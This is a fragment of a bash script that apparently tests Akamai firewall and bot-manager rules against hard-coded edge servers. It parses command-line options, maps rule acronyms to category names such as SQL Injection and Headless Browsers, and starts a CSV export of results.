# Hard-coded edge IPs (colon-separated) and the hostnames resolved instead when -d is set.
# PF/PE = production http/https, SF/SE = staging http/https.
PFIP="23.54.162.184:23.63.22.131:23.63.22.169:186.177.65.217:186.177.65.208"
PEIP="72.246.84.4:23.40.180.4:23.48.16.4"
SFIP="23.50.49.10:23.50.55.19:23.50.55.25:23.50.51.50:23.50.51.51"
SEIP="23.199.36.2:23.34.4.4:23.59.184.2"
PFFQ="a1.g.akamai.net"
PEFQ="e1.a.akamaiedge.net"
SFFQ="a1.g.akamai-staging.net"
SEFQ="e1.a.akamaiedge-staging.net"
rules=()
headerorder=()

while getopts "c:r:vedm" option; do
    case $option in
        c) filecnf=${OPTARG} ;;
        v) verbose=1 ;;
        r) fileref=${OPTARG} ;;
        e) filetim=$(date +%s) ;;
        d) PFIP=""; PEIP=""; SFIP=""; SEIP="" ;;
        m) helpconf; exit ;;
    esac
done

# No options given: print the help text
if (( OPTIND == 1 )); then
    help
    exit
fi

if [[ ${filetim} != '' ]]; then
    export_type=""
    export_payload=""
    # ACRONYMA[i] is the acronym used in the configuration file, ACRONYMB[i] its readable name in the CSV
    ACRONYMA=('man' 'atg' 'bms' 'bmp'
        'krs-cmd' 'krs-xss' 'krs-dos' 'krs-iht' 'krs-php' 'krs-rfi' 'krs-sql' 'krs-trj'
        'aag-wat' 'aag-wpr' 'aag-sql' 'aag-xss' 'aag-lfi' 'aag-rfi' 'aag-cmi' 'aag-wpl' 'penalty'
        'aka-arb' 'aka-asc' 'aka-bib' 'aka-eco' 'aka-eag' 'aka-fia' 'aka-fis' 'aka-job' 'aka-mda'
        'aka-new' 'aka-onl' 'aka-rss' 'aka-seo' 'aka-sit' 'aka-soc' 'aka-war' 'aka-wse'
        'tra-ikb' 'tra-dvf' 'tra-htl' 'tra-wsl' 'tra-osc' 'tra-hbt' 'tra-dcb' 'tra-agc' 'tra-req'
        'act-cok')
    ACRONYMB=('Manual' 'Attack Group' 'Bot Manager Standard' 'Bot Manager Premier'
        'Command Injection' 'Cross-Site Scripting' 'DDOS' 'Invalid HTTP' 'PHP Injection' 'Remote File Inclusion' 'SQL Injection' 'Trojan'
        'Web Attack Tool' 'Web Protocol Attack' 'SQL Injection' 'Cross-Site Scripting' 'Local File Inclusion' 'Remote File Inclusion' 'Command Injection' 'Web Platform Attack' 'Penalty Box'
        'Academic or Research Bots' 'Automated Shopping Cart and Sniper Bots' 'Business Intelligence Bots' 'E-Commerce Search Engine Bots' 'Enterprise Data Aggregator Bots' 'Financial Account Aggregator Bots' 'Financial Services Bots' 'Job Search Engine Bots' 'Media or Entertainment Search Bots'
        'News Aggregator Bots' 'Online Advertising Bots' 'RSS Feed Reader Bots' 'SEO Analytics or Marketing Bots' 'Site Monitoring and Web Development Bots' 'Social Media or Blog Bots' 'Web Archiver Bots' 'Web Search Engine Bots'
        'Impersonators of Known Bots' 'Development Frameworks' 'HTTP Libraries' 'Web Services Libraries' 'Open Source Crawlers/Scraping Platforms' 'Headless Browsers/Automation Tools' 'Declared Bots (Keyword Match)' 'Aggressive Web Crawlers' 'Request Anomaly'
        'Cookie Integrity Failed')
    if [ $verbose -eq 1 ]; then echo -e "> exporting $(basename "${filecnf}")_${filetim}.csv"; fi
    echo "Environment,HTTP Code,Checker reference,Akamai reference,Type,Payload,URL" > "$(basename "${filecnf}")_${filetim}.csv"
fi

readconfig "$filecnf" "$property"